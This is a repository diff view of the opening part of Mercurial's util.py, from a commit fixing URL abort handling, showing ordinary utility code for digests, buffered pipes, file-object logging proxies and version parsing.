##// END OF EJS Templates
util: fix unsafe url abort with bytestr() on url...
Augie Fackler -
r36742:ca201470 default
parent child Browse files
Show More
@@ -1,4066 +1,4066 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 def isatty(fp):
85 85 try:
86 86 return fp.isatty()
87 87 except AttributeError:
88 88 return False
89 89
90 90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 92 # buffering
93 93 if isatty(stdout):
94 94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 95
96 96 if pycompat.iswindows:
97 97 from . import windows as platform
98 98 stdout = platform.winstdout(stdout)
99 99 else:
100 100 from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 shellsplit = platform.shellsplit
151 151 spawndetached = platform.spawndetached
152 152 split = platform.split
153 153 sshargs = platform.sshargs
154 154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 155 statisexec = platform.statisexec
156 156 statislink = platform.statislink
157 157 testpid = platform.testpid
158 158 umask = platform.umask
159 159 unlink = platform.unlink
160 160 username = platform.username
161 161
162 162 try:
163 163 recvfds = osutil.recvfds
164 164 except AttributeError:
165 165 pass
166 166 try:
167 167 setprocname = osutil.setprocname
168 168 except AttributeError:
169 169 pass
170 170 try:
171 171 unblocksignal = osutil.unblocksignal
172 172 except AttributeError:
173 173 pass
174 174
175 175 # Python compatibility
176 176
177 177 _notset = object()
178 178
179 179 # disable Python's problematic floating point timestamps (issue4836)
180 180 # (Python hypocritically says you shouldn't change this behavior in
181 181 # libraries, and sure enough Mercurial is not a library.)
182 182 os.stat_float_times(False)
183 183
184 184 def safehasattr(thing, attr):
185 185 return getattr(thing, attr, _notset) is not _notset
186 186
187 187 def _rapply(f, xs):
188 188 if xs is None:
189 189 # assume None means non-value of optional data
190 190 return xs
191 191 if isinstance(xs, (list, set, tuple)):
192 192 return type(xs)(_rapply(f, x) for x in xs)
193 193 if isinstance(xs, dict):
194 194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 195 return f(xs)
196 196
197 197 def rapply(f, xs):
198 198 """Apply function recursively to every item preserving the data structure
199 199
200 200 >>> def f(x):
201 201 ... return 'f(%s)' % x
202 202 >>> rapply(f, None) is None
203 203 True
204 204 >>> rapply(f, 'a')
205 205 'f(a)'
206 206 >>> rapply(f, {'a'}) == {'f(a)'}
207 207 True
208 208 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 209 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210 210
211 211 >>> xs = [object()]
212 212 >>> rapply(pycompat.identity, xs) is xs
213 213 True
214 214 """
215 215 if f is pycompat.identity:
216 216 # fast path mainly for py2
217 217 return xs
218 218 return _rapply(f, xs)
219 219
220 220 def bytesinput(fin, fout, *args, **kwargs):
221 221 sin, sout = sys.stdin, sys.stdout
222 222 try:
223 223 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 224 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 225 finally:
226 226 sys.stdin, sys.stdout = sin, sout
227 227
228 228 def bitsfrom(container):
229 229 bits = 0
230 230 for bit in container:
231 231 bits |= bit
232 232 return bits
233 233
234 234 # python 2.6 still have deprecation warning enabled by default. We do not want
235 235 # to display anything to standard user so detect if we are running test and
236 236 # only use python deprecation warning in this case.
237 237 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 238 if _dowarn:
239 239 # explicitly unfilter our warning for python 2.7
240 240 #
241 241 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 242 # However, module name set through PYTHONWARNINGS was exactly matched, so
243 243 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
244 244 # makes the whole PYTHONWARNINGS thing useless for our usecase.
245 245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248 248 if _dowarn and pycompat.ispy3:
249 249 # silence warning emitted by passing user string to re.sub()
250 250 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
251 251 r'mercurial')
252 252 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
253 253 DeprecationWarning, r'mercurial')
254 254
255 255 def nouideprecwarn(msg, version, stacklevel=1):
256 256 """Issue an python native deprecation warning
257 257
258 258 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
259 259 """
260 260 if _dowarn:
261 261 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
262 262 " update your code.)") % version
263 263 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
264 264
265 265 DIGESTS = {
266 266 'md5': hashlib.md5,
267 267 'sha1': hashlib.sha1,
268 268 'sha512': hashlib.sha512,
269 269 }
270 270 # List of digest types from strongest to weakest
271 271 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
272 272
273 273 for k in DIGESTS_BY_STRENGTH:
274 274 assert k in DIGESTS
275 275
276 276 class digester(object):
277 277 """helper to compute digests.
278 278
279 279 This helper can be used to compute one or more digests given their name.
280 280
281 281 >>> d = digester([b'md5', b'sha1'])
282 282 >>> d.update(b'foo')
283 283 >>> [k for k in sorted(d)]
284 284 ['md5', 'sha1']
285 285 >>> d[b'md5']
286 286 'acbd18db4cc2f85cedef654fccc4a4d8'
287 287 >>> d[b'sha1']
288 288 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
289 289 >>> digester.preferred([b'md5', b'sha1'])
290 290 'sha1'
291 291 """
292 292
293 293 def __init__(self, digests, s=''):
294 294 self._hashes = {}
295 295 for k in digests:
296 296 if k not in DIGESTS:
297 297 raise Abort(_('unknown digest type: %s') % k)
298 298 self._hashes[k] = DIGESTS[k]()
299 299 if s:
300 300 self.update(s)
301 301
302 302 def update(self, data):
303 303 for h in self._hashes.values():
304 304 h.update(data)
305 305
306 306 def __getitem__(self, key):
307 307 if key not in DIGESTS:
308 308 raise Abort(_('unknown digest type: %s') % k)
309 309 return nodemod.hex(self._hashes[key].digest())
310 310
311 311 def __iter__(self):
312 312 return iter(self._hashes)
313 313
314 314 @staticmethod
315 315 def preferred(supported):
316 316 """returns the strongest digest type in both supported and DIGESTS."""
317 317
318 318 for k in DIGESTS_BY_STRENGTH:
319 319 if k in supported:
320 320 return k
321 321 return None
322 322
323 323 class digestchecker(object):
324 324 """file handle wrapper that additionally checks content against a given
325 325 size and digests.
326 326
327 327 d = digestchecker(fh, size, {'md5': '...'})
328 328
329 329 When multiple digests are given, all of them are validated.
330 330 """
331 331
332 332 def __init__(self, fh, size, digests):
333 333 self._fh = fh
334 334 self._size = size
335 335 self._got = 0
336 336 self._digests = dict(digests)
337 337 self._digester = digester(self._digests.keys())
338 338
339 339 def read(self, length=-1):
340 340 content = self._fh.read(length)
341 341 self._digester.update(content)
342 342 self._got += len(content)
343 343 return content
344 344
345 345 def validate(self):
346 346 if self._size != self._got:
347 347 raise Abort(_('size mismatch: expected %d, got %d') %
348 348 (self._size, self._got))
349 349 for k, v in self._digests.items():
350 350 if v != self._digester[k]:
351 351 # i18n: first parameter is a digest name
352 352 raise Abort(_('%s mismatch: expected %s, got %s') %
353 353 (k, v, self._digester[k]))
354 354
355 355 try:
356 356 buffer = buffer
357 357 except NameError:
358 358 def buffer(sliceable, offset=0, length=None):
359 359 if length is not None:
360 360 return memoryview(sliceable)[offset:offset + length]
361 361 return memoryview(sliceable)[offset:]
362 362
363 363 closefds = pycompat.isposix
364 364
365 365 _chunksize = 4096
366 366
367 367 class bufferedinputpipe(object):
368 368 """a manually buffered input pipe
369 369
370 370 Python will not let us use buffered IO and lazy reading with 'polling' at
371 371 the same time. We cannot probe the buffer state and select will not detect
372 372 that data are ready to read if they are already buffered.
373 373
374 374 This class let us work around that by implementing its own buffering
375 375 (allowing efficient readline) while offering a way to know if the buffer is
376 376 empty from the output (allowing collaboration of the buffer with polling).
377 377
378 378 This class lives in the 'util' module because it makes use of the 'os'
379 379 module from the python stdlib.
380 380 """
381 381 def __new__(cls, fh):
382 382 # If we receive a fileobjectproxy, we need to use a variation of this
383 383 # class that notifies observers about activity.
384 384 if isinstance(fh, fileobjectproxy):
385 385 cls = observedbufferedinputpipe
386 386
387 387 return super(bufferedinputpipe, cls).__new__(cls)
388 388
389 389 def __init__(self, input):
390 390 self._input = input
391 391 self._buffer = []
392 392 self._eof = False
393 393 self._lenbuf = 0
394 394
395 395 @property
396 396 def hasbuffer(self):
397 397 """True is any data is currently buffered
398 398
399 399 This will be used externally a pre-step for polling IO. If there is
400 400 already data then no polling should be set in place."""
401 401 return bool(self._buffer)
402 402
403 403 @property
404 404 def closed(self):
405 405 return self._input.closed
406 406
407 407 def fileno(self):
408 408 return self._input.fileno()
409 409
410 410 def close(self):
411 411 return self._input.close()
412 412
413 413 def read(self, size):
414 414 while (not self._eof) and (self._lenbuf < size):
415 415 self._fillbuffer()
416 416 return self._frombuffer(size)
417 417
418 418 def readline(self, *args, **kwargs):
419 419 if 1 < len(self._buffer):
420 420 # this should not happen because both read and readline end with a
421 421 # _frombuffer call that collapse it.
422 422 self._buffer = [''.join(self._buffer)]
423 423 self._lenbuf = len(self._buffer[0])
424 424 lfi = -1
425 425 if self._buffer:
426 426 lfi = self._buffer[-1].find('\n')
427 427 while (not self._eof) and lfi < 0:
428 428 self._fillbuffer()
429 429 if self._buffer:
430 430 lfi = self._buffer[-1].find('\n')
431 431 size = lfi + 1
432 432 if lfi < 0: # end of file
433 433 size = self._lenbuf
434 434 elif 1 < len(self._buffer):
435 435 # we need to take previous chunks into account
436 436 size += self._lenbuf - len(self._buffer[-1])
437 437 return self._frombuffer(size)
438 438
439 439 def _frombuffer(self, size):
440 440 """return at most 'size' data from the buffer
441 441
442 442 The data are removed from the buffer."""
443 443 if size == 0 or not self._buffer:
444 444 return ''
445 445 buf = self._buffer[0]
446 446 if 1 < len(self._buffer):
447 447 buf = ''.join(self._buffer)
448 448
449 449 data = buf[:size]
450 450 buf = buf[len(data):]
451 451 if buf:
452 452 self._buffer = [buf]
453 453 self._lenbuf = len(buf)
454 454 else:
455 455 self._buffer = []
456 456 self._lenbuf = 0
457 457 return data
458 458
459 459 def _fillbuffer(self):
460 460 """read data to the buffer"""
461 461 data = os.read(self._input.fileno(), _chunksize)
462 462 if not data:
463 463 self._eof = True
464 464 else:
465 465 self._lenbuf += len(data)
466 466 self._buffer.append(data)
467 467
468 468 return data
469 469
470 470 def mmapread(fp):
471 471 try:
472 472 fd = getattr(fp, 'fileno', lambda: fp)()
473 473 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
474 474 except ValueError:
475 475 # Empty files cannot be mmapped, but mmapread should still work. Check
476 476 # if the file is empty, and if so, return an empty buffer.
477 477 if os.fstat(fd).st_size == 0:
478 478 return ''
479 479 raise
480 480
481 481 def popen2(cmd, env=None, newlines=False):
482 482 # Setting bufsize to -1 lets the system decide the buffer size.
483 483 # The default for bufsize is 0, meaning unbuffered. This leads to
484 484 # poor performance on Mac OS X: http://bugs.python.org/issue4194
485 485 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
486 486 close_fds=closefds,
487 487 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
488 488 universal_newlines=newlines,
489 489 env=env)
490 490 return p.stdin, p.stdout
491 491
492 492 def popen3(cmd, env=None, newlines=False):
493 493 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
494 494 return stdin, stdout, stderr
495 495
496 496 def popen4(cmd, env=None, newlines=False, bufsize=-1):
497 497 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
498 498 close_fds=closefds,
499 499 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
500 500 stderr=subprocess.PIPE,
501 501 universal_newlines=newlines,
502 502 env=env)
503 503 return p.stdin, p.stdout, p.stderr, p
504 504
505 505 class fileobjectproxy(object):
506 506 """A proxy around file objects that tells a watcher when events occur.
507 507
508 508 This type is intended to only be used for testing purposes. Think hard
509 509 before using it in important code.
510 510 """
511 511 __slots__ = (
512 512 r'_orig',
513 513 r'_observer',
514 514 )
515 515
516 516 def __init__(self, fh, observer):
517 517 object.__setattr__(self, r'_orig', fh)
518 518 object.__setattr__(self, r'_observer', observer)
519 519
520 520 def __getattribute__(self, name):
521 521 ours = {
522 522 r'_observer',
523 523
524 524 # IOBase
525 525 r'close',
526 526 # closed if a property
527 527 r'fileno',
528 528 r'flush',
529 529 r'isatty',
530 530 r'readable',
531 531 r'readline',
532 532 r'readlines',
533 533 r'seek',
534 534 r'seekable',
535 535 r'tell',
536 536 r'truncate',
537 537 r'writable',
538 538 r'writelines',
539 539 # RawIOBase
540 540 r'read',
541 541 r'readall',
542 542 r'readinto',
543 543 r'write',
544 544 # BufferedIOBase
545 545 # raw is a property
546 546 r'detach',
547 547 # read defined above
548 548 r'read1',
549 549 # readinto defined above
550 550 # write defined above
551 551 }
552 552
553 553 # We only observe some methods.
554 554 if name in ours:
555 555 return object.__getattribute__(self, name)
556 556
557 557 return getattr(object.__getattribute__(self, r'_orig'), name)
558 558
559 559 def __delattr__(self, name):
560 560 return delattr(object.__getattribute__(self, r'_orig'), name)
561 561
562 562 def __setattr__(self, name, value):
563 563 return setattr(object.__getattribute__(self, r'_orig'), name, value)
564 564
565 565 def __iter__(self):
566 566 return object.__getattribute__(self, r'_orig').__iter__()
567 567
568 568 def _observedcall(self, name, *args, **kwargs):
569 569 # Call the original object.
570 570 orig = object.__getattribute__(self, r'_orig')
571 571 res = getattr(orig, name)(*args, **kwargs)
572 572
573 573 # Call a method on the observer of the same name with arguments
574 574 # so it can react, log, etc.
575 575 observer = object.__getattribute__(self, r'_observer')
576 576 fn = getattr(observer, name, None)
577 577 if fn:
578 578 fn(res, *args, **kwargs)
579 579
580 580 return res
581 581
582 582 def close(self, *args, **kwargs):
583 583 return object.__getattribute__(self, r'_observedcall')(
584 584 r'close', *args, **kwargs)
585 585
586 586 def fileno(self, *args, **kwargs):
587 587 return object.__getattribute__(self, r'_observedcall')(
588 588 r'fileno', *args, **kwargs)
589 589
590 590 def flush(self, *args, **kwargs):
591 591 return object.__getattribute__(self, r'_observedcall')(
592 592 r'flush', *args, **kwargs)
593 593
594 594 def isatty(self, *args, **kwargs):
595 595 return object.__getattribute__(self, r'_observedcall')(
596 596 r'isatty', *args, **kwargs)
597 597
598 598 def readable(self, *args, **kwargs):
599 599 return object.__getattribute__(self, r'_observedcall')(
600 600 r'readable', *args, **kwargs)
601 601
602 602 def readline(self, *args, **kwargs):
603 603 return object.__getattribute__(self, r'_observedcall')(
604 604 r'readline', *args, **kwargs)
605 605
606 606 def readlines(self, *args, **kwargs):
607 607 return object.__getattribute__(self, r'_observedcall')(
608 608 r'readlines', *args, **kwargs)
609 609
610 610 def seek(self, *args, **kwargs):
611 611 return object.__getattribute__(self, r'_observedcall')(
612 612 r'seek', *args, **kwargs)
613 613
614 614 def seekable(self, *args, **kwargs):
615 615 return object.__getattribute__(self, r'_observedcall')(
616 616 r'seekable', *args, **kwargs)
617 617
618 618 def tell(self, *args, **kwargs):
619 619 return object.__getattribute__(self, r'_observedcall')(
620 620 r'tell', *args, **kwargs)
621 621
622 622 def truncate(self, *args, **kwargs):
623 623 return object.__getattribute__(self, r'_observedcall')(
624 624 r'truncate', *args, **kwargs)
625 625
626 626 def writable(self, *args, **kwargs):
627 627 return object.__getattribute__(self, r'_observedcall')(
628 628 r'writable', *args, **kwargs)
629 629
630 630 def writelines(self, *args, **kwargs):
631 631 return object.__getattribute__(self, r'_observedcall')(
632 632 r'writelines', *args, **kwargs)
633 633
634 634 def read(self, *args, **kwargs):
635 635 return object.__getattribute__(self, r'_observedcall')(
636 636 r'read', *args, **kwargs)
637 637
638 638 def readall(self, *args, **kwargs):
639 639 return object.__getattribute__(self, r'_observedcall')(
640 640 r'readall', *args, **kwargs)
641 641
642 642 def readinto(self, *args, **kwargs):
643 643 return object.__getattribute__(self, r'_observedcall')(
644 644 r'readinto', *args, **kwargs)
645 645
646 646 def write(self, *args, **kwargs):
647 647 return object.__getattribute__(self, r'_observedcall')(
648 648 r'write', *args, **kwargs)
649 649
650 650 def detach(self, *args, **kwargs):
651 651 return object.__getattribute__(self, r'_observedcall')(
652 652 r'detach', *args, **kwargs)
653 653
654 654 def read1(self, *args, **kwargs):
655 655 return object.__getattribute__(self, r'_observedcall')(
656 656 r'read1', *args, **kwargs)
657 657
658 658 class observedbufferedinputpipe(bufferedinputpipe):
659 659 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
660 660
661 661 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
662 662 bypass ``fileobjectproxy``. Because of this, we need to make
663 663 ``bufferedinputpipe`` aware of these operations.
664 664
665 665 This variation of ``bufferedinputpipe`` can notify observers about
666 666 ``os.read()`` events. It also re-publishes other events, such as
667 667 ``read()`` and ``readline()``.
668 668 """
669 669 def _fillbuffer(self):
670 670 res = super(observedbufferedinputpipe, self)._fillbuffer()
671 671
672 672 fn = getattr(self._input._observer, r'osread', None)
673 673 if fn:
674 674 fn(res, _chunksize)
675 675
676 676 return res
677 677
678 678 # We use different observer methods because the operation isn't
679 679 # performed on the actual file object but on us.
680 680 def read(self, size):
681 681 res = super(observedbufferedinputpipe, self).read(size)
682 682
683 683 fn = getattr(self._input._observer, r'bufferedread', None)
684 684 if fn:
685 685 fn(res, size)
686 686
687 687 return res
688 688
689 689 def readline(self, *args, **kwargs):
690 690 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
691 691
692 692 fn = getattr(self._input._observer, r'bufferedreadline', None)
693 693 if fn:
694 694 fn(res)
695 695
696 696 return res
697 697
698 698 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
699 699 DATA_ESCAPE_MAP.update({
700 700 b'\\': b'\\\\',
701 701 b'\r': br'\r',
702 702 b'\n': br'\n',
703 703 })
704 704 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
705 705
706 706 def escapedata(s):
707 707 if isinstance(s, bytearray):
708 708 s = bytes(s)
709 709
710 710 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
711 711
712 712 class fileobjectobserver(object):
713 713 """Logs file object activity."""
714 714 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
715 715 self.fh = fh
716 716 self.name = name
717 717 self.logdata = logdata
718 718 self.reads = reads
719 719 self.writes = writes
720 720
721 721 def _writedata(self, data):
722 722 if not self.logdata:
723 723 self.fh.write('\n')
724 724 return
725 725
726 726 # Simple case writes all data on a single line.
727 727 if b'\n' not in data:
728 728 self.fh.write(': %s\n' % escapedata(data))
729 729 return
730 730
731 731 # Data with newlines is written to multiple lines.
732 732 self.fh.write(':\n')
733 733 lines = data.splitlines(True)
734 734 for line in lines:
735 735 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
736 736
737 737 def read(self, res, size=-1):
738 738 if not self.reads:
739 739 return
740 740 # Python 3 can return None from reads at EOF instead of empty strings.
741 741 if res is None:
742 742 res = ''
743 743
744 744 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
745 745 self._writedata(res)
746 746
747 747 def readline(self, res, limit=-1):
748 748 if not self.reads:
749 749 return
750 750
751 751 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
752 752 self._writedata(res)
753 753
754 754 def readinto(self, res, dest):
755 755 if not self.reads:
756 756 return
757 757
758 758 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
759 759 res))
760 760 data = dest[0:res] if res is not None else b''
761 761 self._writedata(data)
762 762
763 763 def write(self, res, data):
764 764 if not self.writes:
765 765 return
766 766
767 767 # Python 2 returns None from some write() calls. Python 3 (reasonably)
768 768 # returns the integer bytes written.
769 769 if res is None and data:
770 770 res = len(data)
771 771
772 772 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
773 773 self._writedata(data)
774 774
775 775 def flush(self, res):
776 776 if not self.writes:
777 777 return
778 778
779 779 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
780 780
781 781 # For observedbufferedinputpipe.
782 782 def bufferedread(self, res, size):
783 783 self.fh.write('%s> bufferedread(%d) -> %d' % (
784 784 self.name, size, len(res)))
785 785 self._writedata(res)
786 786
787 787 def bufferedreadline(self, res):
788 788 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
789 789 self._writedata(res)
790 790
791 791 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
792 792 logdata=False):
793 793 """Turn a file object into a logging file object."""
794 794
795 795 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
796 796 logdata=logdata)
797 797 return fileobjectproxy(fh, observer)
798 798
799 799 def version():
800 800 """Return version information if available."""
801 801 try:
802 802 from . import __version__
803 803 return __version__.version
804 804 except ImportError:
805 805 return 'unknown'
806 806
807 807 def versiontuple(v=None, n=4):
808 808 """Parses a Mercurial version string into an N-tuple.
809 809
810 810 The version string to be parsed is specified with the ``v`` argument.
811 811 If it isn't defined, the current Mercurial version string will be parsed.
812 812
813 813 ``n`` can be 2, 3, or 4. Here is how some version strings map to
814 814 returned values:
815 815
816 816 >>> v = b'3.6.1+190-df9b73d2d444'
817 817 >>> versiontuple(v, 2)
818 818 (3, 6)
819 819 >>> versiontuple(v, 3)
820 820 (3, 6, 1)
821 821 >>> versiontuple(v, 4)
822 822 (3, 6, 1, '190-df9b73d2d444')
823 823
824 824 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
825 825 (3, 6, 1, '190-df9b73d2d444+20151118')
826 826
827 827 >>> v = b'3.6'
828 828 >>> versiontuple(v, 2)
829 829 (3, 6)
830 830 >>> versiontuple(v, 3)
831 831 (3, 6, None)
832 832 >>> versiontuple(v, 4)
833 833 (3, 6, None, None)
834 834
835 835 >>> v = b'3.9-rc'
836 836 >>> versiontuple(v, 2)
837 837 (3, 9)
838 838 >>> versiontuple(v, 3)
839 839 (3, 9, None)
840 840 >>> versiontuple(v, 4)
841 841 (3, 9, None, 'rc')
842 842
843 843 >>> v = b'3.9-rc+2-02a8fea4289b'
844 844 >>> versiontuple(v, 2)
845 845 (3, 9)
846 846 >>> versiontuple(v, 3)
847 847 (3, 9, None)
848 848 >>> versiontuple(v, 4)
849 849 (3, 9, None, 'rc+2-02a8fea4289b')
850 850 """
851 851 if not v:
852 852 v = version()
853 853 parts = remod.split('[\+-]', v, 1)
854 854 if len(parts) == 1:
855 855 vparts, extra = parts[0], None
856 856 else:
857 857 vparts, extra = parts
858 858
859 859 vints = []
860 860 for i in vparts.split('.'):
861 861 try:
862 862 vints.append(int(i))
863 863 except ValueError:
864 864 break
865 865 # (3, 6) -> (3, 6, None)
866 866 while len(vints) < 3:
867 867 vints.append(None)
868 868
869 869 if n == 2:
870 870 return (vints[0], vints[1])
871 871 if n == 3:
872 872 return (vints[0], vints[1], vints[2])
873 873 if n == 4:
874 874 return (vints[0], vints[1], vints[2], extra)
875 875
876 876 def cachefunc(func):
877 877 '''cache the result of function calls'''
878 878 # XXX doesn't handle keywords args
879 879 if func.__code__.co_argcount == 0:
880 880 cache = []
881 881 def f():
882 882 if len(cache) == 0:
883 883 cache.append(func())
884 884 return cache[0]
885 885 return f
886 886 cache = {}
887 887 if func.__code__.co_argcount == 1:
888 888 # we gain a small amount of time because
889 889 # we don't need to pack/unpack the list
890 890 def f(arg):
891 891 if arg not in cache:
892 892 cache[arg] = func(arg)
893 893 return cache[arg]
894 894 else:
895 895 def f(*args):
896 896 if args not in cache:
897 897 cache[args] = func(*args)
898 898 return cache[args]
899 899
900 900 return f
901 901
902 902 class cow(object):
903 903 """helper class to make copy-on-write easier
904 904
905 905 Call preparewrite before doing any writes.
906 906 """
907 907
908 908 def preparewrite(self):
909 909 """call this before writes, return self or a copied new object"""
910 910 if getattr(self, '_copied', 0):
911 911 self._copied -= 1
912 912 return self.__class__(self)
913 913 return self
914 914
915 915 def copy(self):
916 916 """always do a cheap copy"""
917 917 self._copied = getattr(self, '_copied', 0) + 1
918 918 return self
919 919
920 920 class sortdict(collections.OrderedDict):
921 921 '''a simple sorted dictionary
922 922
923 923 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
924 924 >>> d2 = d1.copy()
925 925 >>> d2
926 926 sortdict([('a', 0), ('b', 1)])
927 927 >>> d2.update([(b'a', 2)])
928 928 >>> list(d2.keys()) # should still be in last-set order
929 929 ['b', 'a']
930 930 '''
931 931
932 932 def __setitem__(self, key, value):
933 933 if key in self:
934 934 del self[key]
935 935 super(sortdict, self).__setitem__(key, value)
936 936
937 937 if pycompat.ispypy:
938 938 # __setitem__() isn't called as of PyPy 5.8.0
939 939 def update(self, src):
940 940 if isinstance(src, dict):
941 941 src = src.iteritems()
942 942 for k, v in src:
943 943 self[k] = v
944 944
945 945 class cowdict(cow, dict):
946 946 """copy-on-write dict
947 947
948 948 Be sure to call d = d.preparewrite() before writing to d.
949 949
950 950 >>> a = cowdict()
951 951 >>> a is a.preparewrite()
952 952 True
953 953 >>> b = a.copy()
954 954 >>> b is a
955 955 True
956 956 >>> c = b.copy()
957 957 >>> c is a
958 958 True
959 959 >>> a = a.preparewrite()
960 960 >>> b is a
961 961 False
962 962 >>> a is a.preparewrite()
963 963 True
964 964 >>> c = c.preparewrite()
965 965 >>> b is c
966 966 False
967 967 >>> b is b.preparewrite()
968 968 True
969 969 """
970 970
971 971 class cowsortdict(cow, sortdict):
972 972 """copy-on-write sortdict
973 973
974 974 Be sure to call d = d.preparewrite() before writing to d.
975 975 """
976 976
977 977 class transactional(object):
978 978 """Base class for making a transactional type into a context manager."""
979 979 __metaclass__ = abc.ABCMeta
980 980
981 981 @abc.abstractmethod
982 982 def close(self):
983 983 """Successfully closes the transaction."""
984 984
985 985 @abc.abstractmethod
986 986 def release(self):
987 987 """Marks the end of the transaction.
988 988
989 989 If the transaction has not been closed, it will be aborted.
990 990 """
991 991
992 992 def __enter__(self):
993 993 return self
994 994
